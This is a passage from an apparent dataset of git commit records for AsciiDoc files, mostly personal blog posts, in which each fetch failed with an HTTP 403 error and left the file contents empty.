'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d054c4a195c4b1b1a860c480561a564a2c67f356","subject":"Update 2017-12-09-CSS-Cheat-Selectors.adoc","message":"Update 
2017-12-09-CSS-Cheat-Selectors.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-12-09-CSS-Cheat-Selectors.adoc","new_file":"_posts\/2017-12-09-CSS-Cheat-Selectors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2a686177891cfaea985e58b4db2c66049f432f3","subject":"Publish 2016-6-28-PHPER-authority-control.adoc","message":"Publish 2016-6-28-PHPER-authority-control.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control.adoc","new_file":"2016-6-28-PHPER-authority-control.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54d35e3fcc0a03a2b0cd7ef466dc5337161ec910","subject":"Late 2019 Release (#332)","message":"Late 2019 Release (#332)\n\n\r\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2019-11-18-release.adoc","new_file":"content\/news\/2019-11-18-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"40b180b7c244b17fedd55ea9c97ad778ddcdb157","subject":"Update 2017-05-16-Post-JSON-to-a-RES-Tul-service-without-wget-curl-netcat.adoc","message":"Update 2017-05-16-Post-JSON-to-a-RES-Tul-service-without-wget-curl-netcat.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-05-16-Post-JSON-to-a-RES-Tul-service-without-wget-curl-netcat.adoc","new_file":"_posts\/2017-05-16-Post-JSON-to-a-RES-Tul-service-without-wget-curl-netcat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b12c7bc83565aef647e7045bc4c838a15f0ccfa","subject":"removed a some remarks about \"error lines\"","message":"removed a some remarks about \"error lines\"\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af5877224a12fdfded2c86722f57e6cd4b4cb3bf","subject":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","message":"Publish 2016-6-26-PHPER-H5-base64-base64.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_file":"2016-6-26-PHPER-H5-base64-base64.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3e67413ff0841673f83771ad4801c00d003e4dc1","subject":"Update 2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","message":"Update 2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","new_file":"_posts\/2016-02-29-Flat-File-C-M-S-Systeme-auf-Git-Hub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d6c6e950ce08b13c32685d239b51535ce5df5cb","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5d2c1e960a2a619d2a581b4834638d1734a9395","subject":"update QSFP+\/SFP+ support","message":"update QSFP+\/SFP+ support\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c123b2048124da4612b75cd805091e87f625df4","subject":"Update 2015-08-16-Ubuntu-1404-BPG.adoc","message":"Update 2015-08-16-Ubuntu-1404-BPG.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-08-16-Ubuntu-1404-BPG.adoc","new_file":"_posts\/2015-08-16-Ubuntu-1404-BPG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04e937e8ee2a11057993c8fdd7ef6465995b3671","subject":"Update 2016-11-22-Tuesday-Morning.adoc","message":"Update 2016-11-22-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-22-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-22-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"729bfc5fba38a81e011c77ddce8b68b0fb50ee8b","subject":"Hawkular Metrics 0.7.0 - release announcement","message":"Hawkular Metrics 0.7.0 - release 
announcement\n","repos":"lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/09\/30\/hawkular-metrics-0.7.0.Final-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/09\/30\/hawkular-metrics-0.7.0.Final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d1e68f0de725f42d8b85120a4cf60472b7b9fa7","subject":"Add news\/2016-07-15-forge-3.2.3.final.asciidoc","message":"Add news\/2016-07-15-forge-3.2.3.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-07-15-forge-3.2.3.final.asciidoc","new_file":"news\/2016-07-15-forge-3.2.3.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"169ec26ebe9ad2dfae20c125e7fed754f862d8e7","subject":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-i-O-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"723909a683c482924448f67aa3d4c4cd12cde90e","subject":"Delete the file at '_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc'","message":"Delete the file at '_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bc2b88c72614f3b6473ec8918e2de49c398f1e0","subject":"Update 2017-06-13-Your-Blog-title2.adoc","message":"Update 
2017-06-13-Your-Blog-title2.adoc","repos":"zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io,zakkum42\/zakkum42.github.io","old_file":"_posts\/2017-06-13-Your-Blog-title2.adoc","new_file":"_posts\/2017-06-13-Your-Blog-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zakkum42\/zakkum42.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"366074ff919556158d9d06ffe28e840bc84d43db","subject":"Fix typographical errors in readme","message":"Fix typographical errors in readme","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3fa9526461246c11aa9bf683225d796cd59a9893","subject":"Update 2015-05-08-iOS-interview-part-5.adoc","message":"Update 2015-05-08-iOS-interview-part-5.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-05-08-iOS-interview-part-5.adoc","new_file":"_posts\/2015-05-08-iOS-interview-part-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56a8dcb3f7a63a9b443e1323e97f851e52644e41","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d845674f65d1f226cdae898bbb5778c418c82cfa","subject":"Update 2017-07-22-Bechmarking-HIP-Cffe.adoc","message":"Update 2017-07-22-Bechmarking-HIP-Cffe.adoc","repos":"itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io,itsnarsi\/itsnarsi.github.io","old_file":"_posts\/2017-07-22-Bechmarking-HIP-Cffe.adoc","new_file":"_posts\/2017-07-22-Bechmarking-HIP-Cffe.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsnarsi\/itsnarsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d622329eb2888f987dab3bafef7e09f26ec93c3","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59199ba3448c994bb5ccd15570cec2346be437ac","subject":"Delete notes.asciidoc","message":"Delete notes.asciidoc","repos":"brechin\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia","old_file":"notes.asciidoc","new_file":"notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1deaf8aca82d10eb22c3538e4154ff335b5cb32a","subject":"Update 2017-09-22-Another-test-post.adoc","message":"Update 2017-09-22-Another-test-post.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-22-Another-test-post.adoc","new_file":"_posts\/2017-09-22-Another-test-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ac2de4c623065d4043e497a9b79a85c730373b3","subject":"add clojure-asis meetup","message":"add clojure-asis meetup\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/clojure-asia-jun.adoc","new_file":"content\/events\/2022\/clojure-asia-jun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"48ac2d1a99c3e02efee98d6e569b39ad1546c1b8","subject":"y2b create post The 1TB SSD RAID MacBook Pro LIVES! (Super MacBook Pro Project 2013)","message":"y2b create post The 1TB SSD RAID MacBook Pro LIVES! 
(Super MacBook Pro Project 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-05-The-1TB-SSD-RAID-MacBook-Pro-LIVES-Super-MacBook-Pro-Project-2013.adoc","new_file":"_posts\/2013-07-05-The-1TB-SSD-RAID-MacBook-Pro-LIVES-Super-MacBook-Pro-Project-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b706c459cc1f2fb3b57e2ebe4e5b3f2f426a2dd","subject":"Update 2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","message":"Update 2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","new_file":"_posts\/2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02338ad1c3893776a2b263589bc1fb8acf2fbfde","subject":"Works on doc","message":"Works on doc\n","repos":"endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox,endurox-dev\/endurox","old_file":"doc\/api\/xatmi\/tpviewtojson.adoc","new_file":"doc\/api\/xatmi\/tpviewtojson.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endurox-dev\/endurox.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"34733efe4934f4bbddefe560454e65d9896de97e","subject":"Update 2015-05-23-Setup-and-host-an-elasticsearch-server-on-Amazon-EC2-using-Vagrant.adoc","message":"Update 2015-05-23-Setup-and-host-an-elasticsearch-server-on-Amazon-EC2-using-Vagrant.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-23-Setup-and-host-an-elasticsearch-server-on-Amazon-EC2-using-Vagrant.adoc","new_file":"_posts\/2015-05-23-Setup-and-host-an-elasticsearch-server-on-Amazon-EC2-using-Vagrant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rvegas\/rvegas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7d43f60087748d23adac9fa5e511e2166f600ea","subject":"Update 2019-01-13-.adoc","message":"Update 2019-01-13-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-13-.adoc","new_file":"_posts\/2019-01-13-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6551215d997e57cefe6d6042205f35cb3140b1f","subject":"Update 2017-08-17-Speedy-IDE.adoc","message":"Update 
2017-08-17-Speedy-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-17-Speedy-IDE.adoc","new_file":"_posts\/2017-08-17-Speedy-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a03f451831c29727c3719b1a65572684e95094b4","subject":"Metrics requires Wildfly 10","message":"Metrics requires Wildfly 10\n","repos":"jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/installation.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9bc30d4f2cd9c771101663121916c388a15c9b6","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0255ddeeafe6baa88a8862754c4cf0933c36fba3","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"921593ed5de3e0ff6329e55c8d491563476280d6","subject":"Update 2016-06-13-Remember-me.adoc","message":"Update 2016-06-13-Remember-me.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-06-13-Remember-me.adoc","new_file":"_posts\/2016-06-13-Remember-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f14f9f29defabac0e3c9e6c475961d6e7e6c778","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b096f07a6c93c509c1c5ebe6123b993b1a9d09c","subject":"y2b create post Black Ops 2 Custom Controller Unboxing (ProModz)","message":"y2b create post Black Ops 2 Custom Controller Unboxing (ProModz)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-03-Black-Ops-2-Custom-Controller-Unboxing-ProModz.adoc","new_file":"_posts\/2012-12-03-Black-Ops-2-Custom-Controller-Unboxing-ProModz.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e42a0e864f45a955e81bc59925bcdd2279dea629","subject":"y2b create post These Pizza Hut Shoes Will Order Pizza For You\u2026","message":"y2b create post These Pizza Hut Shoes Will Order Pizza For You\u2026","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-15-These-Pizza-Hut-Shoes-Will-Order-Pizza-For-You.adoc","new_file":"_posts\/2017-03-15-These-Pizza-Hut-Shoes-Will-Order-Pizza-For-You.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bae183c532c4dcd94008c99a382645d0c16126a3","subject":"Update 2015-06-04-Ships-Maps-Dev-Diary.adoc","message":"Update 2015-06-04-Ships-Maps-Dev-Diary.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-04-Ships-Maps-Dev-Diary.adoc","new_file":"_posts\/2015-06-04-Ships-Maps-Dev-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52405223968e36cf5adad30abd79dabb587e9081","subject":"y2b create post i quit the challenge","message":"y2b create post i quit the challenge","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-01-i-quit-the-challenge.adoc","new_file":"_posts\/2016-07-01-i-quit-the-challenge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed1dac590f586f9e2570f47f7bde9757dd82e0d4","subject":"Update 2018-07-30-Facebook-A-P-Iver311.adoc","message":"Update 
2018-07-30-Facebook-A-P-Iver311.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_file":"_posts\/2018-07-30-Facebook-A-P-Iver311.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"679edeb8f4170ea0001c60780e64897c13cf34e4","subject":"Update 2017-04-14-First-things-first.adoc","message":"Update 2017-04-14-First-things-first.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-04-14-First-things-first.adoc","new_file":"_posts\/2017-04-14-First-things-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fdb01f198832fe7b3de28ecdbf6645d0e3c0328","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d93a3eb366d561ae4dbc35da90643df12b35406e","subject":"OGM-1022 Update documentation around MongoDB CLI syntax","message":"OGM-1022 Update documentation around MongoDB CLI syntax\n\n Add examples for $orderby, .limit() alternative, update, remove and 